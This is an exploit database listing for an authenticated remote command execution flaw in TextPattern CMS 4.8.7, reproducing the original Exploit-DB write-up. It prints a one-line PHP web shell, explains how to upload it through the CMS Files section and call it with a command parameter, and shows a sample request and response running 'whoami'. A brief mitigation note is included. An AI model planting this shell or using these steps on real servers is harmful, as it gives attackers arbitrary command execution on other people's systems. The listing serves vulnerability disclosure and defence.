header-logo
Suggest Exploit
vendor:
TextPattern CMS
by:
Mert Daş
8,8
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: TextPattern CMS
Affected Version From: 4.8.7
Affected Version To: 4.8.7
Patch Exists: YES
Related CWE: N/A
CPE: a:textpattern:textpattern:4.8.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Xampp
2021

TextPattern CMS 4.8.7 – Remote Command Execution (Authenticated)

First of all, an attacker should use the file upload section to upload a malicious shell containing the code <?PHP system($_GET['cmd']);?>. Then, the attacker should go to the content section, click Files and upload the malicious php file. Finally, the attacker should go to the URL of the malicious file with the command as a parameter (e.g. yourserver/textpattern/files/yourphp.php?cmd=yourcode). After the request is sent, the response will contain the output of the command.

Mitigation:

To mitigate this vulnerability, users should ensure that they are running the latest version of TextPattern CMS and that they have implemented proper access control mechanisms.
Source

Exploit-DB raw data:

# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
# Date : 2021/09/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software web : https://textpattern.com/
# Tested on: Server : Xampp

First of all we should use file upload section to upload our shell.
Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>

1) Go to content section .
2) Click Files and upload malicious php file.
3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;

After upload our file , our request and respons is like below :

Request:

GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
Upgrade-Insecure-Requests: 1


Response:

HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8

pc\mertdas

Navigation

Suggest Exploit

Services By CQR